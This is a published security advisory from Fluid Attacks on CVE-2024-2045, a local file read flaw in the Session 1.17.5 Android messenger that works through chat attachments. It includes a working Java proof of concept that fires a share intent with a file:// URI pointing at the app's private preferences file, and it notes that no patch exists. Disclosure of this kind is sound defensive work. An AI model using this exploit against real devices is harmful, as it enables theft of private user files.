---
slug: advisories/newman/
title: Session 1.17.5 - LFR via chat attachment
authors: Carlos Bello
writer: cbello
codename: newman
product: Session 1.17.5 - LFR via chat attachment
date: 2024-02-29 12:00 COT
cveid: CVE-2024-2045
severity: 4.4
description: Session 1.17.5 - Local File Read via chat attachment
keywords: Fluid Attacks, Security, Vulnerabilities, LFR, Session, Android, CVE
banner: advisories-bg
advise: yes
template: advisory
---

## Summary

<summary-table
    name="Session 1.17.5 - LFR via chat attachment"
    code="[Newman](https://en.wikipedia.org/wiki/John_Newman_(singer))"
    product="Session"
    affected-versions="Version 1.17.5"
    fixed-versions=""
    state="Public"
    release="2024-02-29">
</summary-table>

## Vulnerability

<vulnerability-table
    kind="Business information leak"
    rule="[038. Business information leak](https://help.fluidattacks.com/portal/en/kb/articles/criteria-vulnerabilities-038)"
    remote="Yes"
    vector="CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:N/A:N"
    score="4.4"
    available="Yes"
    id="[CVE-2024-2045](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-2045)">
</vulnerability-table>

## Description

Session version 1.17.5 allows obtaining internal application files and public
files from the user's device without the user's consent. This is possible
because the application is vulnerable to Local File Read via chat attachments.

## Vulnerability

An arbitrary local file reading (LFR) vulnerability has been identified in Session.
The exploit allows an attacker to obtain internal application files or files from
public paths accessed by the application such as images, downloads, etc.

## Exploit

```java
[...]

public class MainActivity extends AppCompatActivity {

    [...]

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);

        [...]

        // Hacking Here
        StrictMode.setVmPolicy(StrictMode.VmPolicy.LAX);
        Intent intent = new Intent("android.intent.action.SEND");
        intent.setClassName("network.loki.messenger","org.thoughtcrime.securesms.ShareActivity");
        intent.putExtra(Intent.EXTRA_STREAM, Uri.parse("file:///data/user/0/network.loki.messenger/shared_prefs/network.loki.messenger_preferences.xml"));
        startActivity(intent);
    }

    [...]
}
```

## Evidence of exploitation

In the evidence we can see how a malicious application installed on the victim's
device can force the user to leak internal files from the application and/or device
to a certain contact.

We studied ways to force the automatic sending to any person using Session, but we
did not find a way (however we do not rule out this possibility).

In short, with a bit of social engineering, a malicious contact could persuade his
victim to obtain his internal files without authorization.

<iframe src="https://shorturl.at/jvGI4"
width="835" height="504" frameborder="0" title="LFR-Session-1.17.5-Part1"
webkitallowfullscreen mozallowfullscreen allowfullscreen controls
loading="lazy"></iframe>

<iframe src="https://shorturl.at/abgY0"
width="835" height="504" frameborder="0" title="LFR-Session-1.17.5-Part2"
webkitallowfullscreen mozallowfullscreen allowfullscreen controls
loading="lazy"></iframe>

## Our security policy

We have reserved the ID CVE-2024-2045 to refer to this issue from now on.

* https://fluidattacks.com/advisories/policy/

## System Information

* Version: Session 1.17.5

* Operating System: Android

## Mitigation

There is currently no patch available for this vulnerability.

## Credits

The vulnerability was discovered by [Carlos
Bello](https://www.linkedin.com/in/carlos-andres-bello) from Fluid Attacks'
Offensive Team.

## References

**Vendor page** <https://github.com/oxen-io/session-android/>

## Timeline

<time-lapse
  discovered="2024-02-21"
  contacted="2024-02-21"
  replied=""
  confirmed=""
  patched=""
  disclosure="2024-02-29">
</time-lapse>
